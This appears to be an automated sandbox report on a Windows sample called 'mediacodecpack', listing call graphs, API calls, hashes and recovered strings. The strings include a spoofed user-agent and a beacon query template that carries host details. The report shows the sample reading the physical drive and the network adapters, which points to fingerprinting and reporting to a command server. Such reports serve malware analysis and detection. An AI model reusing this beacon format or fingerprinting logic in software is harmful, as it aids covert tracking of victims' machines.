61654 2d58e8f GetModuleFileNameA 61653->61654 61655 2d58e8a 61653->61655 61657 2d58ebc 61654->61657 61736 2d53efa 71 API calls __setmbcp 61655->61736 61730 2d58f2f 61657->61730 61659 2d52879 61659->61593 61664 2d590ab 61659->61664 61662 2d58ef5 61662->61659 61663 2d58f2f _parse_cmdline 59 API calls 61662->61663 61663->61659 61665 2d590b4 61664->61665 61667 2d590b9 _strlen 61664->61667 61740 2d53efa 71 API calls __setmbcp 61665->61740 61668 2d5762a __calloc_crt 59 API calls 61667->61668 61671 2d52882 61667->61671 61676 2d590ef _strlen 61668->61676 61669 2d59141 61670 2d51f84 _free 59 API calls 61669->61670 61670->61671 61671->61593 61680 2d57028 61671->61680 61672 2d5762a __calloc_crt 59 API calls 61672->61676 61673 2d59168 61674 2d51f84 _free 59 API calls 61673->61674 61674->61671 61676->61669 61676->61671 61676->61672 61676->61673 61677 2d5917f 61676->61677 61741 2d5592c 59 API calls 2 library calls 61676->61741 61742 2d53b75 8 API calls 2 library calls 61677->61742 61679 2d5918b 61682 2d57034 __IsNonwritableInCurrentImage 61680->61682 61743 2d5ab8f 61682->61743 61683 2d57052 __initterm_e 61684 2d523b4 __cinit 68 API calls 61683->61684 61685 2d57071 _doexit __IsNonwritableInCurrentImage 61683->61685 61684->61685 61685->61593 61686->61570 61687->61597 61688->61562 61689->61569 61690->61576 61691->61572 61692->61570 61694 2d57da2 TlsGetValue 61693->61694 61695 2d57d9e 61693->61695 61694->61564 61695->61564 61697 2d57631 61696->61697 61699 2d5292e 61697->61699 61701 2d5764f 61697->61701 61746 2d5e9b8 61697->61746 61699->61570 61702 2d57daa TlsSetValue 61699->61702 61701->61697 61701->61699 61754 2d580c5 Sleep 61701->61754 61702->61581 61704 2d5495d CallCatchBlock 61703->61704 61705 2d574ab __lock 59 API calls 61704->61705 61706 2d5499a 61705->61706 61757 2d549f2 61706->61757 61709 2d574ab __lock 59 API calls 61710 2d549bb ___addlocaleref 61709->61710 61760 2d549fb 61710->61760 61712 2d549e6 CallCatchBlock 61712->61589 61714 2d51f8d HeapFree 61713->61714 61718 2d51fb6 _free 61713->61718 61715 2d51fa2 61714->61715 61714->61718 61765 2d54acb 59 API calls __getptd_noexit 61715->61765 61717 2d51fa8 GetLastError 61717->61718 61718->61570 61719->61570 61720->61602 61721->61604 61722->61608 61723->61609 61724->61616 61725->61617 61726->61628 61727->61649 61728->61650 61729->61641 61732 2d58f51 61730->61732 61735 2d58fb5 61732->61735 61738 2d5ef96 59 API calls x_ismbbtype_l 61732->61738 61733 2d58ed2 61733->61659 61737 2d57672 59 API calls 2 library calls 61733->61737 61735->61733 61739 2d5ef96 59 API calls x_ismbbtype_l 61735->61739 61736->61654 61737->61662 61738->61732 61739->61735 61740->61667 61741->61676 61742->61679 61744 2d5ab92 RtlEncodePointer 61743->61744 61744->61744 61745 2d5abac 61744->61745 61745->61683 61747 2d5e9c3 61746->61747 61751 2d5e9de 61746->61751 61748 2d5e9cf 61747->61748 61747->61751 61755 2d54acb 59 API calls __getptd_noexit 61748->61755 61749 2d5e9ee RtlAllocateHeap 61749->61751 61752 2d5e9d4 61749->61752 61751->61749 61751->61752 61756 2d56e73 RtlDecodePointer 61751->61756 61752->61697 61754->61701 61755->61752 61756->61751 61763 2d57615 RtlLeaveCriticalSection 61757->61763 61759 2d549b4 61759->61709 61764 2d57615 RtlLeaveCriticalSection 61760->61764 61762 2d54a02 61762->61712 61763->61759 61764->61762 61765->61717 61766 401cdb CopyFileA

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 237 2d45e5e-2d460ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d442c7 GetTickCount call 2d459fa GetVersionExA call 2d53760 call 2d51fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fbc * 4 QueryPerformanceCounter Sleep call 2d51fbc * 2 call 2d53760 * 2 282 2d460f0-2d460f2 237->282 283 2d460f4-2d460f9 282->283 284 2d460fb-2d460fd 282->284 285 2d46104 Sleep 283->285 286 2d460ff 284->286 287 2d4610a-2d46448 RtlEnterCriticalSection RtlLeaveCriticalSection 284->287 285->287 286->285 289 2d46464-2d4646e 287->289 290 2d4644a-2d46450 287->290 289->282 291 2d46474-2d46498 call 2d53760 call 2d4439c 289->291 292 2d46456-2d46463 call 2d4534d 290->292 293 2d46452-2d46454 290->293 291->282 300 2d4649e-2d464c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5134c 291->300 292->289 293->289 303 2d46513-2d4652b call 2d5134c 300->303 304 2d464cb-2d464da call 2d5134c 300->304 309 2d46531-2d46533 303->309 310 2d467d2-2d467e1 call 2d5134c 303->310 304->303 311 2d464dc-2d464eb call 2d5134c 304->311 309->310 314 2d46539-2d465e4 call 2d51fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53760 * 5 call 2d4439c * 2 309->314 319 2d46826-2d46835 call 2d5134c 310->319 320 2d467e3-2d467e5 310->320 311->303 318 2d464ed-2d464fc call 2d5134c 311->318 365 2d465e6-2d465e8 314->365 366 2d46621 314->366 318->303 334 2d464fe-2d4650d call 2d5134c 318->334 332 2d46837-2d46840 call 2d45c11 call 2d45d1f 319->332 333 2d4684a-2d46859 call 2d5134c 319->333 320->319 324 2d467e7-2d46821 call 2d53760 RtlEnterCriticalSection RtlLeaveCriticalSection 320->324 324->282 347 2d46845 332->347 333->282 345 2d4685f-2d46861 333->345 334->282 334->303 345->282 348 2d46867-2d46880 call 2d4439c 345->348 347->282 348->282 353 2d46886-2d46955 call 2d51428 call 2d41ba7 348->353 363 2d46957 call 2d4143f 353->363 364 2d4695c-2d4697d RtlEnterCriticalSection 353->364 363->364 369 2d4697f-2d46986 364->369 370 2d46989-2d469f0 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d4733f 364->370 365->366 371 2d465ea-2d465fc call 2d5134c 365->371 367 2d46625-2d46653 call 2d51fbc call 2d53760 call 2d4439c 366->367 391 2d46694-2d4669d call 2d51f84 367->391 392 2d46655-2d46664 call 2d525f6 367->392 369->370 389 2d469f6-2d46a38 call 2d49729 370->389 390 2d46b58-2d46b6c call 2d48007 370->390 371->366 378 2d465fe-2d4661f call 2d4439c 371->378 378->367 401 2d46b22-2d46b33 call 2d473ee 389->401 402 2d46a3e-2d46a45 389->402 390->282 403 2d467c0-2d467cd 391->403 404 2d466a3-2d466bb call 2d527c5 391->404 392->391 405 2d46666 392->405 411 2d46b38-2d46b53 call 2d433b2 401->411 408 2d46a48-2d46a4d 402->408 403->282 417 2d466c7 404->417 418 2d466bd-2d466c5 call 2d4873b 404->418 406 2d4666b-2d4667d call 2d51860 405->406 420 2d46682-2d46692 call 2d525f6 406->420 421 2d4667f 406->421 408->408 412 2d46a4f-2d46a94 call 2d49729 408->412 411->390 412->401 426 2d46a9a-2d46aa0 412->426 419 2d466c9-2d46757 call 2d49853 call 2d43863 call 2d45119 call 2d43863 call 2d49af9 call 2d49c13 417->419 418->419 446 2d4675c-2d4676d 419->446 420->391 420->406 421->420 430 2d46aa3-2d46aa8 426->430 430->430 432 2d46aaa-2d46ae5 call 2d49729 430->432 432->401 438 2d46ae7-2d46b1b call 2d4c11b 432->438 442 2d46b20-2d46b21 438->442 442->401 447 2d46774-2d4679f Sleep call 2d50900 446->447 448 2d4676f call 2d4380b 446->448 452 2d467a1-2d467aa call 2d44100 447->452 453 2d467ab-2d467b9 447->453 448->447 452->453 453->403 455 2d467bb call 2d4380b 453->455 455->403
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02D74FD0), ref: 02D45E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02D45ED8
                                                                                              • Part of subcall function 02D459FA: _malloc.LIBCMT ref: 02D45A08
                                                                                            • GetVersionExA.KERNEL32(02D74E20), ref: 02D45F05
                                                                                            • _memset.LIBCMT ref: 02D45F24
                                                                                            • _malloc.LIBCMT ref: 02D45F31
                                                                                              • Part of subcall function 02D51FBC: __FF_MSGBANNER.LIBCMT ref: 02D51FD3
                                                                                              • Part of subcall function 02D51FBC: __NMSG_WRITE.LIBCMT ref: 02D51FDA
                                                                                              • Part of subcall function 02D51FBC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02D51FFF
                                                                                            • _malloc.LIBCMT ref: 02D45F41
                                                                                            • _malloc.LIBCMT ref: 02D45F4C
                                                                                            • _malloc.LIBCMT ref: 02D45F57
                                                                                            • _malloc.LIBCMT ref: 02D45F62
                                                                                            • _malloc.LIBCMT ref: 02D45F6D
                                                                                            • _malloc.LIBCMT ref: 02D45F78
                                                                                            • _malloc.LIBCMT ref: 02D45F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FC1
                                                                                            • _memset.LIBCMT ref: 02D45FD1
                                                                                            • _memset.LIBCMT ref: 02D45FDD
                                                                                            • _memset.LIBCMT ref: 02D45FEA
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D45FF8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46005
                                                                                            • _malloc.LIBCMT ref: 02D46026
                                                                                            • _malloc.LIBCMT ref: 02D46034
                                                                                            • _malloc.LIBCMT ref: 02D4603B
                                                                                            • _malloc.LIBCMT ref: 02D4605C
                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D46068
                                                                                            • Sleep.KERNELBASE(00000000), ref: 02D46076
                                                                                            • _malloc.LIBCMT ref: 02D46082
                                                                                            • _malloc.LIBCMT ref: 02D46092
                                                                                            • _memset.LIBCMT ref: 02D460A7
                                                                                            • _memset.LIBCMT ref: 02D460B7
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02D46104
                                                                                            • RtlEnterCriticalSection.NTDLL(02D74FD0), ref: 02D4610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02D74FD0), ref: 02D46120
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                            • String ID: @mp$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 1856495841-1622055518
                                                                                            • Opcode ID: 308b66ba86de82b766d1937d443339dfaf4f5fa933d8127289b53c4ae04d1f07
                                                                                            • Instruction ID: fe7f2a41f063b4fb7f004ea227af35233e6066de1c79d3697fbddee1503fa390
                                                                                            • Opcode Fuzzy Hash: 308b66ba86de82b766d1937d443339dfaf4f5fa933d8127289b53c4ae04d1f07
                                                                                            • Instruction Fuzzy Hash: 4B71B071D48350AFD711AB74A809B5BBBE8EF55314F100D1DFA8997381EBB88C548FA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 790 2d4e9ab-2d4e9ce LoadLibraryA 791 2d4e9d4-2d4e9e2 GetProcAddress 790->791 792 2d4ea8e-2d4ea95 790->792 793 2d4ea87-2d4ea88 FreeLibrary 791->793 794 2d4e9e8-2d4e9f8 791->794 793->792 795 2d4e9fa-2d4ea06 GetAdaptersInfo 794->795 796 2d4ea3e-2d4ea46 795->796 797 2d4ea08 795->797 798 2d4ea4f-2d4ea54 796->798 799 2d4ea48-2d4ea4e call 2d526df 796->799 800 2d4ea0a-2d4ea11 797->800 802 2d4ea56-2d4ea59 798->802 803 2d4ea82-2d4ea86 798->803 799->798 804 2d4ea13-2d4ea17 800->804 805 2d4ea1b-2d4ea23 800->805 802->803 807 2d4ea5b-2d4ea60 802->807 803->793 804->800 808 2d4ea19 804->808 809 2d4ea26-2d4ea2b 805->809 810 2d4ea62-2d4ea6a 807->810 811 2d4ea6d-2d4ea78 call 2d527c5 807->811 808->796 809->809 812 2d4ea2d-2d4ea3a call 2d4e6fa 809->812 810->811 811->803 817 2d4ea7a-2d4ea7d 811->817 812->796 817->795
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02D4E9C1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D4E9DA
                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D4E9FF
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02D4EA88
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                            • API String ID: 514930453-3114217049
                                                                                            • Opcode ID: 3245ed24d717381837910ca32d33c7fb73fa79e4891099e0784b55caaba1d14d
                                                                                            • Instruction ID: 69b1db60b494abe1c03b71209b822ec4dd893d1df2c2072bb3880630f1444bee
                                                                                            • Opcode Fuzzy Hash: 3245ed24d717381837910ca32d33c7fb73fa79e4891099e0784b55caaba1d14d
                                                                                            • Instruction Fuzzy Hash: 9821A271A08259ABDB10DBA8D8856EEBBB8FF05314F1441AAE585E7301DB709E45CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 818 2d42b95-2d42baf 819 2d42bc7-2d42bcb 818->819 820 2d42bb1-2d42bb9 call 2d4fb20 818->820 822 2d42bcd-2d42bd0 819->822 823 2d42bdf 819->823 827 2d42bbf-2d42bc2 820->827 822->823 825 2d42bd2-2d42bdd call 2d4fb20 822->825 826 2d42be2-2d42c11 WSASetLastError WSARecv call 2d4950d 823->826 825->827 832 2d42c16-2d42c1d 826->832 830 2d42d30 827->830 833 2d42d32-2d42d38 830->833 834 2d42c2c-2d42c32 832->834 835 2d42c1f-2d42c2a call 2d4fb20 832->835 836 2d42c34-2d42c39 call 2d4fb20 834->836 837 2d42c46-2d42c48 834->837 843 2d42c3f-2d42c42 835->843 836->843 841 2d42c4f-2d42c60 call 2d4fb20 837->841 842 2d42c4a-2d42c4d 837->842 841->833 845 2d42c66-2d42c69 841->845 842->845 843->837 848 2d42c73-2d42c76 845->848 849 2d42c6b-2d42c6d 845->849 848->830 851 2d42c7c-2d42c9a call 2d4fb20 call 2d4166f 848->851 849->848 850 2d42d22-2d42d2d call 2d41996 849->850 850->830 858 2d42cbc-2d42cfa WSASetLastError select call 2d4950d 851->858 859 2d42c9c-2d42cba call 2d4fb20 call 2d4166f 851->859 865 2d42cfc-2d42d06 call 2d4fb20 858->865 866 2d42d08 858->866 859->830 859->858 872 2d42d19-2d42d1d 865->872 869 2d42d15-2d42d17 866->869 870 2d42d0a-2d42d12 call 2d4fb20 866->870 869->830 869->872 870->869 872->826
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42BE4
                                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D42C07
                                                                                              • Part of subcall function 02D4950D: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4951B
                                                                                            • WSASetLastError.WS2_32 ref: 02D42CD3
                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D42CE7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Recvselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 886190287-280543908
                                                                                            • Opcode ID: 61dddbe247a9118998a13a1706be7c1b554b742acf8bb935caa7d76f4ffeb4cb
                                                                                            • Instruction ID: 88a0104b85cd3db30fa9c5750fe3a3149040f94c90d2cf3cba33a107878e524b
                                                                                            • Opcode Fuzzy Hash: 61dddbe247a9118998a13a1706be7c1b554b742acf8bb935caa7d76f4ffeb4cb
                                                                                            • Instruction Fuzzy Hash: 674127B19083019FD7109F64C9187ABBBE9AF85354F10491EF89987790EF74DD40CBA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 875 2d4e8a7-2d4e8d2 CreateFileA 876 2d4e9a3-2d4e9aa 875->876 877 2d4e8d8-2d4e8ed 875->877 878 2d4e8f0-2d4e912 DeviceIoControl 877->878 879 2d4e914-2d4e91c 878->879 880 2d4e94b-2d4e953 878->880 883 2d4e925-2d4e92a 879->883 884 2d4e91e-2d4e923 879->884 881 2d4e955-2d4e95b call 2d526df 880->881 882 2d4e95c-2d4e95e 880->882 881->882 886 2d4e960-2d4e963 882->886 887 2d4e999-2d4e9a2 CloseHandle 882->887 883->880 888 2d4e92c-2d4e934 883->888 884->880 890 2d4e965-2d4e96e GetLastError 886->890 891 2d4e97f-2d4e98c call 2d527c5 886->891 887->876 892 2d4e937-2d4e93c 888->892 890->887 893 2d4e970-2d4e973 890->893 891->887 899 2d4e98e-2d4e994 891->899 892->892 895 2d4e93e-2d4e94a call 2d4e6fa 892->895 893->891 896 2d4e975-2d4e97c 893->896 895->880 896->891 899->878
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D4E8C6
                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D4E904
                                                                                            • GetLastError.KERNEL32 ref: 02D4E965
                                                                                            • CloseHandle.KERNELBASE(?), ref: 02D4E99C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                            • API String ID: 4026078076-1180397377
                                                                                            • Opcode ID: 77ebb4be8ac56b024ab941454cef88ecc69d4543a81fd3ce9dc2f3760fced96c
                                                                                            • Instruction ID: e06359a148760a9dd71d8c45e23370d3219473bb0326f6ac0ff5fe44bfa35723
                                                                                            • Opcode Fuzzy Hash: 77ebb4be8ac56b024ab941454cef88ecc69d4543a81fd3ce9dc2f3760fced96c
                                                                                            • Instruction Fuzzy Hash: 80316B71D00229FBDB24CF95D888BAEBBB8FF45754F20456AE505A7380DB705E44CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 921 401951-40d878 GetLocalTime 925 40de86-40df52 StartServiceCtrlDispatcherA 921->925 926 40d87e-40d88c 921->926 928 40e028-40e02e lstrcmpiW 925->928 926->928
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(0040BE00), ref: 00401B4D
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherLocalServiceStartTimelstrcmpi
                                                                                            • String ID: /chk
                                                                                            • API String ID: 4108452588-3837807730
                                                                                            • Opcode ID: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction ID: c0b6fb2c802bab406561895994aa9e9237411ab6f3462ae67dbec63e80f3bd48
                                                                                            • Opcode Fuzzy Hash: b98aab331838fe6632ee09d3ee6537478d9e654e437189eacf188a04f6302d0c
                                                                                            • Instruction Fuzzy Hash: 4121D070904658CBDB048B609E697E63BF4AB06340F0081BAC886F72E2D738890ADB19

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 2d45de1-2d45de4 1 2d45dea-2d45dec 0->1 2 2d45e6d-2d45ec4 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1->2 3 2d45def-2d45df7 1->3 6 2d45ecb-2d460ec GetTickCount call 2d459fa GetVersionExA call 2d53760 call 2d51fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fbc * 4 QueryPerformanceCounter Sleep call 2d51fbc * 2 call 2d53760 * 2 2->6 7 2d45ec6 call 2d442c7 2->7 4 2d45dbf-2d45dc2 3->4 5 2d45df9-2d45e3b 3->5 8 2d45dc4 4->8 9 2d45d61-2d45d78 4->9 11 2d45dc5-2d45dcf 5->11 18 2d45e3d-2d45e3e 5->18 61 2d460f0-2d460f2 6->61 7->6 8->11 13 2d45d7a-2d45d8e 9->13 14 2d45d0b-2d45d15 9->14 17 2d45d94-2d45da9 11->17 19 2d45d18-2d45d1e 13->19 20 2d45d90 13->20 14->19 17->4 18->2 20->1 21 2d45d92 20->21 21->17 62 2d460f4-2d460f9 61->62 63 2d460fb-2d460fd 61->63 64 2d46104 Sleep 62->64 65 2d460ff 63->65 66 2d4610a-2d46448 RtlEnterCriticalSection RtlLeaveCriticalSection 63->66 64->66 65->64 68 2d46464-2d4646e 66->68 69 2d4644a-2d46450 66->69 68->61 70 2d46474-2d46498 call 2d53760 call 2d4439c 68->70 71 2d46456-2d46463 call 2d4534d 69->71 72 2d46452-2d46454 69->72 70->61 79 2d4649e-2d464c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5134c 70->79 71->68 72->68 82 2d46513-2d4652b call 2d5134c 79->82 83 2d464cb-2d464da call 2d5134c 79->83 88 2d46531-2d46533 82->88 89 2d467d2-2d467e1 call 2d5134c 82->89 83->82 90 2d464dc-2d464eb call 2d5134c 83->90 88->89 93 2d46539-2d465e4 call 2d51fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53760 * 5 call 2d4439c * 2 88->93 98 2d46826-2d46835 call 2d5134c 89->98 99 2d467e3-2d467e5 89->99 90->82 97 2d464ed-2d464fc call 2d5134c 90->97 144 2d465e6-2d465e8 93->144 145 2d46621 93->145 97->82 113 2d464fe-2d4650d call 2d5134c 97->113 111 2d46837-2d46845 call 2d45c11 call 2d45d1f 98->111 112 2d4684a-2d46859 call 2d5134c 98->112 99->98 103 2d467e7-2d46821 call 2d53760 RtlEnterCriticalSection RtlLeaveCriticalSection 99->103 103->61 111->61 112->61 124 2d4685f-2d46861 112->124 113->61 113->82 124->61 127 2d46867-2d46880 call 2d4439c 124->127 127->61 132 2d46886-2d46955 call 2d51428 call 2d41ba7 127->132 142 2d46957 call 2d4143f 132->142 143 2d4695c-2d4697d RtlEnterCriticalSection 132->143 142->143 148 2d4697f-2d46986 143->148 149 2d46989-2d469f0 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d4733f 143->149 144->145 150 2d465ea-2d465fc call 2d5134c 144->150 146 2d46625-2d46653 call 2d51fbc call 2d53760 call 2d4439c 145->146 170 2d46694-2d4669d call 2d51f84 146->170 171 2d46655-2d46664 call 2d525f6 146->171 148->149 168 2d469f6-2d46a38 call 2d49729 149->168 169 2d46b58-2d46b6c call 2d48007 149->169 150->145 157 2d465fe-2d4661f call 2d4439c 150->157 157->146 180 2d46b22-2d46b53 call 2d473ee call 2d433b2 168->180 181 2d46a3e-2d46a45 168->181 169->61 182 2d467c0-2d467cd 170->182 183 2d466a3-2d466bb call 2d527c5 170->183 171->170 184 2d46666 171->184 180->169 187 2d46a48-2d46a4d 181->187 182->61 196 2d466c7 183->196 197 2d466bd-2d466c5 call 2d4873b 183->197 185 2d4666b-2d4667d call 2d51860 184->185 199 2d46682-2d46692 call 2d525f6 185->199 200 2d4667f 185->200 187->187 191 2d46a4f-2d46a94 call 2d49729 187->191 191->180 205 2d46a9a-2d46aa0 191->205 198 2d466c9-2d4676d call 2d49853 call 2d43863 call 2d45119 call 2d43863 call 2d49af9 call 2d49c13 196->198 197->198 226 2d46774-2d4679f Sleep call 2d50900 198->226 227 2d4676f call 2d4380b 198->227 199->170 199->185 200->199 209 2d46aa3-2d46aa8 205->209 209->209 211 2d46aaa-2d46ae5 call 2d49729 209->211 211->180 217 2d46ae7-2d46b21 call 2d4c11b 211->217 217->180 231 2d467a1-2d467aa call 2d44100 226->231 232 2d467ab-2d467b9 226->232 227->226 231->232 232->182 234 2d467bb call 2d4380b 232->234 234->182
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.NTDLL(02D74FD0), ref: 02D45E92
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D45EA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EB2
                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D45EC1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D45EC4
                                                                                            • GetTickCount.KERNEL32 ref: 02D45ED8
                                                                                            • GetVersionExA.KERNEL32(02D74E20), ref: 02D45F05
                                                                                            • _memset.LIBCMT ref: 02D45F24
                                                                                            • _malloc.LIBCMT ref: 02D45F31
                                                                                            • _malloc.LIBCMT ref: 02D45F41
                                                                                            • _malloc.LIBCMT ref: 02D45F4C
                                                                                            • _malloc.LIBCMT ref: 02D45F57
                                                                                            • _malloc.LIBCMT ref: 02D45F62
                                                                                            • _malloc.LIBCMT ref: 02D45F6D
                                                                                            • _malloc.LIBCMT ref: 02D45F78
                                                                                            • _malloc.LIBCMT ref: 02D45F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D45F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D45FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D45FC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                            • String ID: @mp$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 3007647348-1622055518
                                                                                            • Opcode ID: ae8f3c39b6e5d4e4d1ce202106c7e0be86cf3b867d426e41ac59a4c4c66670b4
                                                                                            • Instruction ID: 1e1604252ec09d8c679c75cd489d41b9388e248e1c18fa45b6f7230ecf4fabfd
                                                                                            • Opcode Fuzzy Hash: ae8f3c39b6e5d4e4d1ce202106c7e0be86cf3b867d426e41ac59a4c4c66670b4
                                                                                            • Instruction Fuzzy Hash: E2A1F472D483509FD711AF34A84875BBFE4EF5A314F54086EE98897381DBB88C15CBA2

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
